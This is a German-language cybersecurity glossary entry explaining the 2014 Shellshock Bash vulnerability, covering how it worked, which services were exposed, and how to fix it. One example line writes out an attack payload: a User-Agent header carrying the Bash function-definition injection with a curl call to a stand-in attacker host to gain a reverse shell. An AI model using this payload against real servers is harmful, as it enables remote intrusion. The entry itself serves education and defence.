Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Deutsch
Entry № 1149

Shellshock (CVE-2014-6271)

Geprüft vonCybersecurity entrepreneur & security researcher

Was ist Shellshock (CVE-2014-6271)?

Shellshock (CVE-2014-6271)GNU-Bash-Schwachstelle von 2014, mit der Angreifer beliebige Befehle ausführen konnten, indem speziell gestaltete Umgebungsvariablen über andere Programme an Bash übergeben wurden.

Shellshock (CVE-2014-6271 plus die verwandte CVE-2014-7169) ist ein Fehler in der Verarbeitung von Funktionsdefinitionen in Umgebungsvariablen durch GNU Bash: Befehle nach dem Funktionsrumpf wurden beim Shell-Start ausgeführt. Weil viele Dienste — CGI-Skripte, DHCP-Clients, OpenSSH ForceCommand, qmail — Bash mit angreiferkontrollierten Variablen aufriefen, war der Bug remote und oft als root trivial ausnutzbar. Die Offenlegung 2014 löste weltweit Notfall-Patches und massenhafte Ausnutzung für Botnets, Webshells und Würmer aus. Behebung: Bash auf gepatchte Versionen aktualisieren, Bash-CGI-Architekturen ablösen, Defense-in-Depth mit Privilegienentzug und Einschränkung der Variablenweitergabe.

Beispiele

  1. 01

    User-Agent () { :; }; /bin/curl attacker.com an einen Bash-CGI-Endpunkt senden, um eine Reverse Shell zu erhalten.

  2. 02

    Ausnutzen eines DHCP-Clients, der Option-Strings in die Umgebung eines Bash-Hook-Skripts exportiert.

Häufige Fragen

Was ist Shellshock (CVE-2014-6271)?

GNU-Bash-Schwachstelle von 2014, mit der Angreifer beliebige Befehle ausführen konnten, indem speziell gestaltete Umgebungsvariablen über andere Programme an Bash übergeben wurden. Es gehört zur Kategorie Schwachstellen der Cybersicherheit.

Was bedeutet Shellshock (CVE-2014-6271)?

GNU-Bash-Schwachstelle von 2014, mit der Angreifer beliebige Befehle ausführen konnten, indem speziell gestaltete Umgebungsvariablen über andere Programme an Bash übergeben wurden.

Wie schützt man sich gegen Shellshock (CVE-2014-6271)?

Schutzmaßnahmen gegen Shellshock (CVE-2014-6271) kombinieren typischerweise technische Kontrollen und operative Praktiken, wie in der Definition oben beschrieben.

Welche anderen Bezeichnungen gibt es für Shellshock (CVE-2014-6271)?

Übliche alternative Bezeichnungen: Bashdoor, CVE-2014-6271.

Verwandte Begriffe